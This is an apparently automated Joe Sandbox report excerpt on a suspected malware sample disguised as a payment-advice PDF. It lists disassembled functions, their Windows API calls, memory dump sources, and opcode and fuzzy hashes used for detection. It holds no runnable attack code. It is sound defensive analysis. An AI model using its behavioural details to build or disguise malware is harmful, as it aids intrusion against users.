                                                              • Opcode ID: 3e722f454d56c754b9e7c6b10c2bf36094d4a3dba03dfc4cb5ce6a7cca10b574
                                                              • Instruction ID: 7c5983f8f3dafee36cdcf64307d2d331d2cce072d65d1376a8c4163927e59150
                                                              • Opcode Fuzzy Hash: 3e722f454d56c754b9e7c6b10c2bf36094d4a3dba03dfc4cb5ce6a7cca10b574
                                                              • Instruction Fuzzy Hash: CC31DE31904606AFEF24AFB48C44FB77BBCFB00304F184165E821C21A1F73598A9EBA5
                                                              Function 00898A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 00898A30
                                                              • PostMessageW.USER32(?,00000201,00000001), ref: 00898ADA
                                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00898AE2
                                                              • PostMessageW.USER32(?,00000202,00000000), ref: 00898AF0
                                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00898AF8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessagePostSleep$RectWindow
                                                              • String ID:
                                                              • API String ID: 3382505437-0
                                                              • Opcode ID: 824fb21f3b020742c5f526d6953ee5b59f1aa6ac6c366d709d1573e9e629e3aa
                                                              • Instruction ID: caede88775f9c1bf124bca95ec75291111d239919c5fb97d9e5d704f84fa8c06
                                                              • Opcode Fuzzy Hash: 824fb21f3b020742c5f526d6953ee5b59f1aa6ac6c366d709d1573e9e629e3aa
                                                              • Instruction Fuzzy Hash: 8F31DF7150022AEFDF14DFA8DD4CA9E3BB6FB05325F14822AF925E62D1C7B09910DB91
                                                              Function 0089B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsWindowVisible.USER32(?), ref: 0089B204
                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0089B221
                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0089B259
                                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0089B27F
                                                              • _wcsstr.LIBCMT ref: 0089B289
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                              • String ID:
                                                              • API String ID: 3902887630-0
                                                              • Opcode ID: c62d5ea0ae21e68fc166656ba6e9eb519557cf9580dfaeb9a4c4f842b1a4fe1e
                                                              • Instruction ID: 23162dfbac01f0e9a4d4a1f80fb593f20b2b3801644dcefea4acbde476f83087
                                                              • Opcode Fuzzy Hash: c62d5ea0ae21e68fc166656ba6e9eb519557cf9580dfaeb9a4c4f842b1a4fe1e
                                                              • Instruction Fuzzy Hash: 832125312042047AEF156BB9AD09E7F7BA9FF49720F044139F804CA1A1EB71DC409660
                                                              Function 008CB14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00842612: GetWindowLongW.USER32(?,000000EB), ref: 00842623
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 008CB192
                                                              • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 008CB1B7
                                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 008CB1CF
                                                              • GetSystemMetrics.USER32(00000004), ref: 008CB1F8
                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,008B0E90,00000000), ref: 008CB216
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Window$Long$MetricsSystem
                                                              • String ID:
                                                              • API String ID: 2294984445-0
                                                              • Opcode ID: cc518b5e8678806df0feef995b330232cec33959978d281e1eb0ae1010febc54
                                                              • Instruction ID: 058c761f5359c762f05319b1b448465e02845d6e46f05ff0552a769e8cd80ecc
                                                              • Opcode Fuzzy Hash: cc518b5e8678806df0feef995b330232cec33959978d281e1eb0ae1010febc54
                                                              • Instruction Fuzzy Hash: AF217C71A24A65AFCB209F389C09F6A3BB5FB05325F154629BE22D71E0E730D8109B90
                                                              Function 00899307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00899320
                                                                • Part of subcall function 00847BCC: _memmove.LIBCMT ref: 00847C06
                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00899352
                                                              • __itow.LIBCMT ref: 0089936A
                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00899392
                                                              • __itow.LIBCMT ref: 008993A3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$__itow$_memmove
                                                              • String ID:
                                                              • API String ID: 2983881199-0
                                                              • Opcode ID: 3e44712e7a258dbb55dda64088d8910190b13bdf1b52650a5913f2eef2829aba
                                                              • Instruction ID: a51a9b723ea6a5caf4ee19f18b532de04fe0a35f9d3ab4ecd289f33d719e79cd
                                                              • Opcode Fuzzy Hash: 3e44712e7a258dbb55dda64088d8910190b13bdf1b52650a5913f2eef2829aba
                                                              • Instruction Fuzzy Hash: 9821C531700208ABDF10AE698C85EAE7BADFB58710F085029FE85D73D1E6B08D45A792
                                                              Function 008B5A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsWindow.USER32(00000000), ref: 008B5A6E
                                                              • GetForegroundWindow.USER32 ref: 008B5A85
                                                              • GetDC.USER32(00000000), ref: 008B5AC1
                                                              • GetPixel.GDI32(00000000,?,00000003), ref: 008B5ACD
                                                              • ReleaseDC.USER32(00000000,00000003), ref: 008B5B08
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Window$ForegroundPixelRelease
                                                              • String ID:
                                                              • API String ID: 4156661090-0
                                                              • Opcode ID: b1f7193a06636ec4ee8ad73c60d314c28fdb1c7115fa049f6e941828ce673faa
                                                              • Instruction ID: 540e717720a21ed2a812ccbb6aeeb55141ae6ea66699c499e02cdf16c056854b
                                                              • Opcode Fuzzy Hash: b1f7193a06636ec4ee8ad73c60d314c28fdb1c7115fa049f6e941828ce673faa
                                                              • Instruction Fuzzy Hash: 85216F75A00118AFE714EF69D884E9ABBF5FF49310F148479F949D7362DA30AD00CB91
                                                              Function 008412F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0084134D
                                                              • SelectObject.GDI32(?,00000000), ref: 0084135C
                                                              • BeginPath.GDI32(?), ref: 00841373
                                                              • SelectObject.GDI32(?,00000000), ref: 0084139C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ObjectSelect$BeginCreatePath
                                                              • String ID:
                                                              • API String ID: 3225163088-0
                                                              • Opcode ID: f8dcc0f8ff4223a954963dcdadb07d753927234b575a8a526ce0c558b2c12d61
                                                              • Instruction ID: 83c89977ffdf5bf015af95d56990b731b0fb08d7ed762b2f4ace5ea17ae0ef6f
                                                              • Opcode Fuzzy Hash: f8dcc0f8ff4223a954963dcdadb07d753927234b575a8a526ce0c558b2c12d61
                                                              • Instruction Fuzzy Hash: 21213630814A0CEFDF11CF25EC48B6A7BA9FB00B65F198226EC14962B1D77499D1EF90
                                                              Function 0089BC9E Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _memcmp
                                                              • String ID:
                                                              • API String ID: 2931989736-0
                                                              • Opcode ID: 199f6ec1e95c249c9b8ecc2b8628ce6c9180f1613a492253a218be85731685b5
                                                              • Instruction ID: 2071f4132c97ad7c6686dc6c3893c1254ca80423d832e24ce90ce4382794c797
                                                              • Opcode Fuzzy Hash: 199f6ec1e95c249c9b8ecc2b8628ce6c9180f1613a492253a218be85731685b5
                                                              • Instruction Fuzzy Hash: 0E0169A26001096AEA047A15AE42FBBA35DFF6039CF0C4422FD15DB342EB64EE1082A5
                                                              Function 008A4A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentThreadId.KERNEL32 ref: 008A4ABA
                                                              • __beginthreadex.LIBCMT ref: 008A4AD8
                                                              • MessageBoxW.USER32(?,?,?,?), ref: 008A4AED
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 008A4B03
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 008A4B0A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                              • String ID:
                                                              • API String ID: 3824534824-0
                                                              • Opcode ID: 0b28d7da7ff4f013d554fd4543834f383c2f392a47cfed66d540cdd5ce8a29cd
                                                              • Instruction ID: 6bb3f46f31cf221a97aa286e47bf45287f0c7d421ec986aabfae59bd6b2e1208
                                                              • Opcode Fuzzy Hash: 0b28d7da7ff4f013d554fd4543834f383c2f392a47cfed66d540cdd5ce8a29cd
                                                              • Instruction Fuzzy Hash: A8110876908618BFEB018FAC9C04E9B7FAEFB85320F154266F924D3351D6B1C9008BB0
                                                              Function 00898202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0089821E
                                                              • GetLastError.KERNEL32(?,00897CE2,?,?,?), ref: 00898228
                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00897CE2,?,?,?), ref: 00898237
                                                              • HeapAlloc.KERNEL32(00000000,?,00897CE2,?,?,?), ref: 0089823E
                                                              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00898255
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 842720411-0
                                                              • Opcode ID: 84593695c236763e1baf482c64c47fc173958e64907ef404813fc3abb7763f37
                                                              • Instruction ID: 288cbcbf7561b6758c0e8b6ed6c75b3bf6b246d2eb9ea67b22c49d41c4d5b7b8
                                                              • Opcode Fuzzy Hash: 84593695c236763e1baf482c64c47fc173958e64907ef404813fc3abb7763f37
                                                              • Instruction Fuzzy Hash: 79014671200605FFEB205FA6DC48D6B7FBEFF8A755B54042AF909C3220DA318C00DA60
                                                              Function 0089710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00897044,80070057,?,?,?,00897455), ref: 00897127
                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00897044,80070057,?,?), ref: 00897142
                                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00897044,80070057,?,?), ref: 00897150
                                                              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00897044,80070057,?), ref: 00897160
                                                              • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00897044,80070057,?,?), ref: 0089716C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                              • String ID:
                                                              • API String ID: 3897988419-0
                                                              • Opcode ID: faff347ef61719c37cbe6aa9a0666ca48c5ecefd6f6b1b11be54d2e16a92a86f
                                                              • Instruction ID: 3fd85857b183b07460ed54e112fcc57b1ec339e45dd5b569ad46895d8a6d2a7d
                                                              • Opcode Fuzzy Hash: faff347ef61719c37cbe6aa9a0666ca48c5ecefd6f6b1b11be54d2e16a92a86f
                                                              • Instruction Fuzzy Hash: 13017C72621208BFEB115F64DC44EAA7BBEFB48792F180078FE04D2221E731DD419BA0
                                                              Function 008A5244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008A5260
                                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 008A526E
                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 008A5276
                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 008A5280
                                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008A52BC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                              • String ID:
                                                              • API String ID: 2833360925-0
                                                              • Opcode ID: 887d84ecf624827000a7c8cc3332931d62f663f117d5411908e65782e1729f5c
                                                              • Instruction ID: 9298823a788b653f940ba1a6dd2641699f86e0e3325216209d53bd5b4e449365
                                                              • Opcode Fuzzy Hash: 887d84ecf624827000a7c8cc3332931d62f663f117d5411908e65782e1729f5c
                                                              • Instruction Fuzzy Hash: BF012931D01A1DDBEF00EFE4E849AEDBB79FB0A711F450156EA45F2642CB30959487A1
                                                              Function 0089810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00898121
                                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0089812B
                                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0089813A
                                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00898141
                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00898157
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 44706859-0
                                                              • Opcode ID: 0d81165dbdc2924776375dcade0d330d480b7f33e7cad73b50a1cabcd1a38c03
                                                              • Instruction ID: 81343c578fbffb72ac0094ba830b96d20d26ab122eccdf0fb887b885e295a929
                                                              • Opcode Fuzzy Hash: 0d81165dbdc2924776375dcade0d330d480b7f33e7cad73b50a1cabcd1a38c03
                                                              • Instruction Fuzzy Hash: 9AF04F71200305EFEB121FA5EC88E6B3BBDFF4AB54B040026FA45C6151CB719941DA60
                                                              Function 0089C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0089C1F7
                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 0089C20E
                                                              • MessageBeep.USER32(00000000), ref: 0089C226
                                                              • KillTimer.USER32(?,0000040A), ref: 0089C242
                                                              • EndDialog.USER32(?,00000001), ref: 0089C25C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                              • String ID:
                                                              • API String ID: 3741023627-0
                                                              • Opcode ID: fff42141d6541164c0cf8a88128a70d06cb41db7cd0cf9ee72ed4106ad7885e0
                                                              • Instruction ID: dc2a28e794163f1229c92a3938b55bec73d840272d46e78c8c86441e263f17f6
                                                              • Opcode Fuzzy Hash: fff42141d6541164c0cf8a88128a70d06cb41db7cd0cf9ee72ed4106ad7885e0
                                                              • Instruction Fuzzy Hash: 5A01D630404308ABFF246BA4ED4EF9677B9FF10B06F044669F682E14E2DBF169449B90
                                                              Function 008413B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • EndPath.GDI32(?), ref: 008413BF
                                                              • StrokeAndFillPath.GDI32(?,?,0087B888,00000000,?), ref: 008413DB
                                                              • SelectObject.GDI32(?,00000000), ref: 008413EE
                                                              • DeleteObject.GDI32 ref: 00841401
                                                              • StrokePath.GDI32(?), ref: 0084141C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                              • String ID:
                                                              • API String ID: 2625713937-0
                                                              • Opcode ID: acb05b5e5cb1c5d4f23932faefe3c7d0ff87f4855724a029bbb712a460e655a5
                                                              • Instruction ID: af084accf5813947c752398922598bd98ee09303c1969016d2a7fb307a85c6e4
                                                              • Opcode Fuzzy Hash: acb05b5e5cb1c5d4f23932faefe3c7d0ff87f4855724a029bbb712a460e655a5
                                                              • Instruction Fuzzy Hash: 70F0F630018B08EFEB115F66EC4CB593BA6F700B26F09C224ED69880B2C7348995EF10
                                                              Function 00852CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00860DB6: std::exception::exception.LIBCMT ref: 00860DEC
                                                                • Part of subcall function 00860DB6: __CxxThrowException@8.LIBCMT ref: 00860E01
                                                                • Part of subcall function 00847DE1: _memmove.LIBCMT ref: 00847E22
                                                                • Part of subcall function 00847A51: _memmove.LIBCMT ref: 00847AAB
                                                              • __swprintf.LIBCMT ref: 00852ECD
                                                              Strings
                                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00852D66
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
